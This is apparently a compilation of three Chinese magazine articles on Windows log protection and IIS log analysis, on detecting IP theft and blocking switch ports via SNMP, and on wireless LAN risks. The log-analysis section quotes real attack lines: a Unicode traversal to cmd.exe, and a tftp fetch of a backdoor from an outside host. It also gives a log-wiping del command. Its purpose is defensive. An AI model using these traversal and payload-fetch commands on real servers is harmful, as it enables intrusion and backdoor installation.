Windows“黑匣子”的保護和分析

 

Windows系統以它的易用性倍受網管員的青睞，國內相當部分的大型網站都是用Windows 2000/XP系統建立的。Windows系統使用的人多了，研究它安全的人也多了。在此我要提醒一下網管們，雖然你補上了所有的安全補丁，但是誰又知道新的漏洞何時又會被發現呢？所以也應該做好系統日誌的保護工作。
作為駭客，他們也是最關心系統日誌的，一旦他們入侵成功，要做的第一件事就是刪除你的記錄檔，使你在被入侵後無法追蹤駭客行為，以及檢查駭客所做的操作行為。記錄檔就像飛機中的“黑匣子”一樣重要，因為裡面儲存著駭客入侵行為的所有罪證。

日誌的移位與保護

Windows 2000的系統記錄檔包括：應用程式記錄檔、安全日誌、系統日誌、DNS服務日誌，以及FTP串連日誌和HTTPD日誌等。在預設情況下記錄檔大小為512KB，日誌儲存的預設的位置如下：
安全記錄檔：%systemroot%\system32\config \SecEvent.EVT
系統記錄檔：%systemroot%\system32\config \SysEvent.EVT
應用程式記錄檔檔案：%systemroot%\system32\config \AppEvent.EVT
FTP串連日誌和HTTPD交易記錄：%systemroot% \system32\LogFiles\，下面還有子檔案夾，分別對應該FTP和Web服務的日誌，其對應的尾碼名為.Log。
在此筆者把系統預設為.EVT副檔名的記錄檔統稱為事件記錄，筆者看了好多文章介紹對事件記錄移位能做到很好的保護。移位雖是一種保護方法，但只要在命令列輸入dir c:\*.evt/s（如系統安裝在D盤，則盤符為D），一下就可尋找到事件記錄位置。日誌移位要通過修改註冊表來完成，我們找到註冊表HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\ Services\Eventlog位置，下面的Application、Security、System幾個子鍵，分別對應“應用程式記錄檔”、“安全日誌”、“系統日誌”。如何修改註冊表，下面我們來看看Application子鍵，1所示。

圖1

File項就是“應用程式記錄檔”檔案存放的位置，把此索引值改為我們要存放記錄檔的檔案夾，然後再把%systemroot%\system32\config\appevent.evt檔案拷貝到此檔案夾，再重啟機器。在此介紹移位的目的是為了充分利用Windows 2000在NTFS格式下的“安全”屬性，如果不移位也無法對檔案進行安全設定作業，右擊移位後的檔案夾選擇“屬性”，進入“安全”選項卡，不選擇“允許將來自父系的可繼承許可權傳播給該對象”，添加“System”組，分別給Everyone組“讀取”許可權，System組選擇除“完全控制”和“修改”的許可權。然後再將系統預設的記錄檔512KB大小改為你所想要的大小，如20MB。
進行了上面的設定後，再直接通過Del C:\*.Evt/s/q來刪除是刪不掉的；對系統正在使用的記錄檔案在命令列形式中用上面的命令也是拒絕操作的。

記錄檔的備份

基於WMI技術的記錄備份指令碼
WMI（Windows Management Instrumentation）技術是微軟提供的Windows下的系統管理工具，基於WMI開發的指令碼均可在Windows 2000/NT上成功運行。微軟提供了一個指令碼，利用WMI將記錄檔大小設為25MB，並允許日誌自動覆蓋14天前的日誌。（編者按：限於篇幅，指令碼就不刊登了，需要的讀者朋友請自行到微軟網站上尋找，或向責編索要。）
我們只需把該指令碼儲存為.vbs副檔名的檔案就可以使用，我們還可以修改上面的指令碼來備份記錄檔，筆者在此建議，在備份日誌時一定將EVT的尾碼名改為其他尾碼儲存（如.C），目的是讓攻擊者不易找到。

通過dumpel工具的備份
可用微軟Resource Kit工具箱中的dumpel.exe工具備份記錄檔，其格式為：
dumpel -f file [-s \\server] [-l log [-m source]] [-e n1 n2 n3..] [-r] [-t] [-dx]
-s \\server  輸出遠端電腦日誌，如果是本地，這個可以省略。
-f filename  輸出日誌的位置和檔案名稱。
-l log log 可選為System，Security，Application,可能還有別的如DNS等。
如要把目標伺服器Server上的系統日誌轉存為Systemlog.log可以用如下格式：
dumpel \\ server -l system -f Systemlog.log
如果利用計劃任務還可以實現定期備份系統日誌。

HTTPD交易記錄的分析

Microsoft的IIS 5自公布到現在，被駭客利用的漏洞是很多的，像.ida/.idq、unicode、WebDavx3和一些未知的漏洞，我們備份日誌的目的就是為了分析駭客入侵的行為，對於沒有打好補丁包的系統被駭客成功入侵的日誌記錄分別對應如下。

unicode漏洞入侵日誌記錄
我們開啟IIS5的Web服務的記錄檔,記錄檔預設位置在%systemroot%\system32\LogFiles\檔案夾下，2所示是一個典型的Unicode漏洞入侵行為的日誌記錄，對於正常的Web訪問，是通過80連接埠用GET命令擷取Web資料，但通過非法的字元編碼可繞過字元驗證而得到不應該得到的資訊。但補上相應的補丁可堵上此洞。

圖2

如通過下面的編碼查看目標機的目錄檔案：
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200
則日誌中會記錄下此訪問行為：
2003-03-01 08:47:47 192.168.0.1 - 192.168.0.218 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
然而我們的日誌中記錄的一清二楚，是來自192.168.0.1的攻擊者查看我們的目錄。而下面一行是向我們的機器傳送後門程式的記錄：
2003-03-01 08:47:47 192.168.0.1 - 192.168.0.218 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2061.48.10.129%20GET%20cool.dll%20c:\httpodbc.dll 502 -

WebDavx3遠程溢出日誌記錄
最近在駭客界有名的Wevdavx3漏洞是應用最廣泛的，連打了最新SP3補丁的系統也不放過。如果系統遭受了此遠程溢出的攻擊行為，則日誌記錄3所示。

圖3

我們看到圖中這樣的一行資訊：
2003-04-18 07:20:13 192.168.0.218 - 192.168.0.218 80 LOCK
/AAAAA……
就表示我們的Web服務受到了來自192.168.0.218的攻擊,並鎖定(即關閉)了WEB服務。後面的一些亂碼字元是在溢出攻擊時使用的位移位猜過程。
上面都記錄了入侵行為的IP地址，此IP地址並不能排除是攻擊者使用了跳板，也就是說此IP很可能是“肉雞”而不是攻擊者的IP，但再查看其他記錄檔，還是有可能追查出攻擊者的位置。
不過筆者寫到最後，還是想說一句，最好還是安裝一個_blank">防火牆來記錄和阻止駭客行為。
看好您的IP地址
——通過管理交換器連接埠來阻止IP地址盜用
■ 北京 高秀霞
目前IP地址盜用行為非常常見，許多“不法之徒”用盜用地址的行為來逃避追蹤、隱藏自己的身份。IP地址的盜用行為侵害了網路正常使用者的權益，並且給網路安全、網路的正常運行帶來了巨大的負面影響，因此研究IP地址盜用的問題，找出有效防範措施，是當前的一個緊迫課題。

IP地址盜用常用的方法及其防範機制

IP地址盜用是指盜用者使用未經授權的IP地址來配置網上的電腦。IP地址的盜用通常有以下兩種方法：
一是單純修改IP地址的盜用方法。如果使用者在配置或修改配置時，使用的不是合法獲得的IP地址，就形成了IP地址盜用。由於IP地址是一個協議邏輯地址，是一個需要使用者佈建並隨時修改的值，因此無法限制使用者修改原生IP地址。
二是同時修改IP-MAC地址的方法。針對單純修改IP地址的問題，很多單位都採用IP-MAC捆綁技術加以解決。但IP-MAC捆綁技術無法防止使用者對IP-MAC的修改。MAC地址是網路裝置的硬體地址，對於乙太網路來說，即俗稱的網卡地址。每個網卡上的MAC地址在所有乙太網路裝置中必須是惟一的，它由IEEE分配，固化在網卡上一般不得隨意改動。但是，一些相容網卡的MAC地址卻可以通過配置程式來修改。如果將一台電腦的IP和MAC地址都修改為另一台合法主機對應的IP和MAC地址，那麼IP-MAC捆綁技術就無能為力了。另外，對於一些MAC地址不能直接修改的網卡，使用者還可以通過軟體修改MAC地址，即通過修改底層網路軟體達到欺騙上層軟體的目的。
目前發現IP地址盜用比較常用的方法是定期掃描網路各路由器的ARP(address resolution protocol)表，獲得當前正在使用的IP地址以及IP-MAC對照關係，與合法的IP地址表，IP-MAC表對照，如果不一致則有非法訪問行為發生。另外，從使用者的故障報告(盜用正在使用的IP地址會出現MAC地址衝突的提示)也可以發現IP地址的盜用行為。在此基礎上，常用的防範機制有：IP-MAC捆綁技術、Proxy 伺服器技術、IP-MAC-USER認證授權以及透明網關技術等。
這些機制都有一定的局限性，比如IP-MAC捆綁技術使用者管理十分困難；透明網關技術需要專門的機器進行資料轉寄，該機器容易成為瓶頸。更重要的是，這些機制都沒有完全從根本上防止IP地址盜用行為所產生的危害，只是防止地址盜用者直接存取外部網路資源。事實上，由於IP地址盜用者仍然具有IP子網內完全活動的自由，因此一方面這種行為會干擾合法使用者的使用：另一方面可能被不良企圖者用來攻擊子網內的其他機器和網路裝置。如果子網內有Proxy 伺服器，盜用者還可以通過種種手段獲得網外資源。

利用連接埠定位及阻斷IP地址盜用

交換器是區域網路的主要網路裝置，它工作在資料連結層上，基於MAC地址來轉寄和過濾資料包。因此，每個交換器均維護著一個與連接埠對應的MAC地址表。任何與交換器直接相連或處於同一廣播域的主機的MAC地址均會被儲存到交換器的MAC地址表中。通過SNMP(Simple Network Management protocol)管理站與各個交換器的SNMP代理通訊可以擷取每個交換器儲存的與連接埠對應的MAC地址表，從而形成一個即時的Switch-Port-MAC對應表。將即時獲得的Switch-Port-MAC對應表與事先獲得的合法的完整表格對照，就可以快速發現交換器連接埠是否出現非法MAC地址，進一步即可判定是否有IP地址盜用的發生。如果同一個MAC地址同時出現在不同的交換器的非級聯連接埠上，則意味著IP-MAC成對盜用。
發現了地址盜用行為後，實際上也已經將盜用行為定位到了交換器的連接埠。再通過查詢事先建立的完整的Switch-Port-MAC對應表，就可以立即定位到發生盜用行為的房間。
發生了地址盜用行為後，可以立即採取相應的方法來阻斷盜用行為所產生的影響，技術上可以通過SNMP管理站向交換器代理髮出一個SNMP訊息來關斷髮生盜用行為的連接埠，這樣盜用IP地址的機器無法與網路中其他機器發生任何聯絡，當然也無法影響其他機器的正常運行。
連接埠的關斷可以通過改變其管理狀態來實現。在MIB(Management Information Base)中有一個代表連接埠管理狀態的可讀寫對象ifAdminStatus(物件識別碼號為1.3.6.1.2.1.2.2.1.7)，給ifAdminStatus賦不同的值，可以改變連接埠的管理狀態，即“1”—開啟連接埠，“2”—關閉連接埠，“3”—供測試用。
這樣，通過管理站給交換器發送賦值資訊(Set Request)，就可以關閉和開啟相應的連接埠，比如要關閉某一交換器(192.168.1.1)的2號連接埠，可以向該交換器發出如下資訊：
set("private" 192.168.1.1 1.3.6.1，2.1.2.2.1.7.2.0.2).
結合IP-MAC綁定技術，通過交換器連接埠管理，可以在實際使用中迅速發現並阻斷IP地址的盜用行為，尤其是解決了IP-MAC成對盜用的問題，同時也不影響網路的運行效率。

無線區域網路：
招賊之處不少
■ 廈門 中英
無線區域網路（WLAN）現在越來越廣泛，但無線區域網路絡的安全存在一定的隱患，招賊之處不少，任意設定無線存取裝置(AP；Access Point)以及電腦間直接互連的Ad Hoc網路都是公司資訊安全的大缺口。下面我們就去破解一番。

未經許可的AP
未經授權的無線存取裝置(AP；Access Point)是今日資訊洩漏最大的威脅。無管制的AP幾乎連最基本的Wired Equivalent Privacy（WEP）加密功能都沒有。此外，即使配有WEP，想要竊聽者也能通過公司網路使用AirSnort和NetStumbler截取WLAN上的資訊。公司必須立下規定處罰擅自架設AP者，偵查未受管制的AP是公司保護資訊安全第一要加強的方面，採用多層級的保護方法才能防禦所有侵入者。

未受管制的無線筆記本網路
未經許可的無線網路裝置正通過各種無線科技進入企業。Intel新發售的迅馳Centrino無線晶片讓所有新型Laptops都能配有WLAN的裝置，這些都需要安全防護偵查功能。未經授權的WLAN月台必須有保護措施以保護使用者避免串連到來路不明的WLANs，或串連到駭客的電腦，引發電腦資料被竊取。一個被侵入的WLAN可能就是企業龐大電腦網路安全的缺口。

Ad Hoc網路
和無管制的AP一樣，Ad Hoc無線網路的安全也令人憂心。因為網路管理者完全無法管制Laptops電腦的資料安全。WLAN卡允許筆記本之間即使沒有AP也能夠交換資訊。這些Ad Hoc網路允許兩台電腦自由轉移資訊。當WLAN卡以Ad Hoc模式操作時，使用者基本上是信任在電波範圍之內的所有月台。Ad Hoc網路提供很少的鑒別管理和安全防護。惡意月台能夠直接連接Ad Hoc網路上的使用者，並且因此而可以串連至企業的網路。

當資料轉送速率太慢時
一個802.11b WLAN應該可以提供企業使用者5.5Mbps或11Mbps的傳輸串流量，若只能提供慢速如1Mbps或2Mbps速度，即可能有駭客進行中非法行為。

通過AP不經認證即允許進入虛擬商業網路(VPN)
有安全意識的企業會在VPN入口前評鑑所有使用者的身份。許多企業卻未留意，讓來自WLAN的使用者不須認證身份即允許進入VPN。

通過鄰近AP感應連結
WLAN的RF訊號不會僅局限在受限辦公室之內，有可能電腦會無意間聯機至鄰近企業的WLAN，可能會因此泄漏密碼或敏感檔案給鄰近的WLAN。

非標準的WLAN卡
企業建置的WLAN網路都是採購Wi-Fi標準裝置，具備網路安全和管理功能。與未經認可的非標準WLAN卡和AP一樣，都有泄密的可能。

SSID（Service Set Identifier，業務群組識別碼）泄密
SSID（Service Set Identifier，業務群組識別碼）反映出WLAN的性質和名稱(SSIDs與其它WLAN資訊流一同被公開地傳播)，所以企業應該小心不要在SSIDs泄漏資訊。SSIDs應該避免使用部門名稱，如Human Resources、Accounting或者Engineering等。如此可能會吸引駭客通過SSID到WLAN尋找員工檔案、財務資訊或技術資訊。

不安全的Windows XP自動設定
WLAN安全政策應該落實到每個無線月台和裝置，但有些Windows XP的自動設定卻增加了安全上的風險。Laptops會主動偵查以便串連至附近的AP或不安全裝置包括：自動連接所有未經認可的無線網路月台、發射訊號尋找過去曾經連結過的AP，以及可以與其它Laptops直接溝通。

下班後的WLAN網路關閉
WLAN的RF訊號能跨越建築物，許多企業開始限制WLAN的使用僅於白天上班時間，以免駭客在夜晚伺機而動，因此在非工作期間關閉AP。